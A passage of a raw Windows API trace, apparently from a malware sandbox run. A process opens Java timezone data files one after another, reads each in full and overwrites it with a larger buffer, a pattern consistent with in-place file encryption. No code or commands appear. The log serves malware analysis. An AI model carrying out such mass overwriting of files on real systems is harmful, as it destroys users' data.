nNumberOfBytesToRead=0x69, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eb8c70*, lpNumberOfBytesRead=0x2fdf2bc*=0x69, lpOverlapped=0x0) returned 1 [0136.922] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.923] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5f1, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5f1, lpOverlapped=0x0) returned 1 [0136.923] CloseHandle (hObject=0x1cc) returned 1 [0136.923] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Guatemala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\guatemala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x89 [0136.924] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.925] ReleaseMutex (hMutex=0x168) returned 1 [0136.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guatemala", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guatemala", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guatemala", lpUsedDefaultChar=0x0) returned 9 [0136.925] ReadFile (in: hFile=0x1cc, lpBuffer=0x261fb58, nNumberOfBytesToRead=0x89, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x261fb58*, lpNumberOfBytesRead=0x2fdf2bc*=0x89, lpOverlapped=0x0) returned 1 [0136.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0136.926] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x611, lpOverlapped=0x0) returned 1 [0136.927] CloseHandle (hObject=0x1cc) returned 1 [0136.927] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x384 [0136.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0136.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.934] ReleaseMutex (hMutex=0x168) returned 1 [0136.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marengo", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marengo", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Marengo", lpUsedDefaultChar=0x0) returned 7 [0136.935] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x2fdf2bc*=0x384, lpOverlapped=0x0) returned 1 [0137.719] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.719] WriteFile (in: hFile=0x1cc, lpBuffer=0x2897af8*, nNumberOfBytesToWrite=0x90c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897af8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x90c, lpOverlapped=0x0) returned 1 [0137.719] CloseHandle (hObject=0x1cc) returned 1 [0137.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Jamaica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\jamaica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0137.720] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.720] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe9 [0137.720] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.720] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.720] ReleaseMutex (hMutex=0x168) returned 1 [0137.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jamaica", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0137.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jamaica", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jamaica", lpUsedDefaultChar=0x0) returned 7 [0137.720] ReadFile (in: hFile=0x1cc, lpBuffer=0x2697108, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697108*, lpNumberOfBytesRead=0x2fdf2bc*=0xe9, lpOverlapped=0x0) returned 1 [0137.722] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.722] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x671, lpOverlapped=0x0) returned 1 [0137.722] CloseHandle (hObject=0x1cc) returned 1 [0137.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0137.828] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.828] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xb9 [0137.828] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.828] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.829] ReleaseMutex (hMutex=0x168) returned 1 [0137.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Managua", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0137.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Managua", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Managua", lpUsedDefaultChar=0x0) returned 7 [0137.829] ReadFile (in: hFile=0x208, lpBuffer=0x26a0238, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a0238*, lpNumberOfBytesRead=0x2fdf2bc*=0xb9, lpOverlapped=0x0) returned 1 [0137.830] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.830] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x641, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x641, lpOverlapped=0x0) returned 1 [0137.830] CloseHandle (hObject=0x208) returned 1 [0137.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0137.831] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.832] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x370 [0137.832] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.832] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.832] ReleaseMutex (hMutex=0x168) returned 1 [0137.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mexico_City", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mexico_City", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mexico_City", lpUsedDefaultChar=0x0) returned 11 [0137.832] ReadFile (in: hFile=0x208, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x2fdf2bc*=0x370, lpOverlapped=0x0) returned 1 [0137.844] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.844] WriteFile (in: hFile=0x208, lpBuffer=0x28721a8*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28721a8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x8f8, lpOverlapped=0x0) returned 1 [0137.844] CloseHandle (hObject=0x208) returned 1 [0137.845] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0137.845] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.846] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7a8 [0137.846] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.846] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.846] ReleaseMutex (hMutex=0x168) returned 1 [0137.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="New_York", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="New_York", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="New_York", lpUsedDefaultChar=0x0) returned 8 [0137.846] ReadFile (in: hFile=0x208, lpBuffer=0x2893998, nNumberOfBytesToRead=0x7a8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893998*, lpNumberOfBytesRead=0x2fdf2bc*=0x7a8, lpOverlapped=0x0) returned 1 [0137.949] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.949] WriteFile (in: hFile=0x208, lpBuffer=0x1ea4988*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4988*, lpNumberOfBytesWritten=0x2fdf2d0*=0xd30, lpOverlapped=0x0) returned 1 [0137.949] CloseHandle (hObject=0x208) returned 1 [0137.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Panama" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\panama"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0137.950] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.950] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0137.951] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.951] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.951] ReleaseMutex (hMutex=0x168) returned 1 [0137.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Panama", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0137.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Panama", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Panama", lpUsedDefaultChar=0x0) returned 6 [0137.951] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0137.952] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0137.952] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0137.953] CloseHandle (hObject=0x208) returned 1 [0137.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0137.954] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.954] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x478 [0137.954] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0137.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.954] ReleaseMutex (hMutex=0x168) returned 1 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rainy_River", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rainy_River", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rainy_River", lpUsedDefaultChar=0x0) returned 11 [0137.954] ReadFile (in: hFile=0x208, lpBuffer=0x25a7b98, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7b98*, lpNumberOfBytesRead=0x2fdf2bc*=0x478, lpOverlapped=0x0) returned 1 [0138.041] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.041] WriteFile (in: hFile=0x208, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa00, lpOverlapped=0x0) returned 1 [0138.041] CloseHandle (hObject=0x208) returned 1 [0138.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santiago" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santiago"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.042] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.042] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x558 [0138.043] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.043] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.043] ReleaseMutex (hMutex=0x168) returned 1 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santiago", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santiago", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Santiago", lpUsedDefaultChar=0x0) returned 8 [0138.043] ReadFile (in: hFile=0x208, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x558, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x558, lpOverlapped=0x0) returned 1 [0138.079] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.079] WriteFile (in: hFile=0x208, lpBuffer=0x25adcd8*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25adcd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xae0, lpOverlapped=0x0) returned 1 [0138.080] CloseHandle (hObject=0x208) returned 1 [0138.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.081] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.081] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0138.082] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.082] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.082] ReleaseMutex (hMutex=0x168) returned 1 [0138.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Thomas", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0138.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Thomas", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Thomas", lpUsedDefaultChar=0x0) returned 9 [0138.082] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.083] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.084] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.084] CloseHandle (hObject=0x208) returned 1 [0138.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.085] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.086] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0138.086] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.086] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.086] ReleaseMutex (hMutex=0x168) returned 1 [0138.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tortola", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tortola", cchWideChar=7, lpMultiByteStr=0x1f7acfc, 